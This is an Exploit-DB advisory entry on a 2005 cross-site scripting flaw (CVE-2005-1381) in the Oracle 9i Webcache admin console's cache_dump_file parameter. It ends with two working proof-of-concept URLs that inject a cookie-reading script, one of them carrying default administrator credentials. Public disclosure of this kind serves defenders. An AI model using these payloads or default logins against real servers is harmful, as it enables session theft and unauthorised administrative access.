Oracle Application Server 9i Webcache Cache_dump_file Cross-Site Scripting Vulnerability

2005-04-28T00:00:00
ID EDB-ID:25562
Type exploitdb
Reporter Alexander Kornbrust
Modified 2005-04-28T00:00:00

Description

Oracle Application Server 9i Webcache Cache_dump_file Cross-Site Scripting Vulnerability. CVE-2005-1381. Remote exploits for multiple platform

                                        
                                            source : http://www.securityfocus.com/bid/13421/info

A remote cross-site scripting vulnerability affects the Oracle Application Server 9i Webcache administration console. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.

The issue affects the 'cache_dump_file' parameter of the 'webcacheadmin' script. 

http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>
http://administrator:administrator@example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script>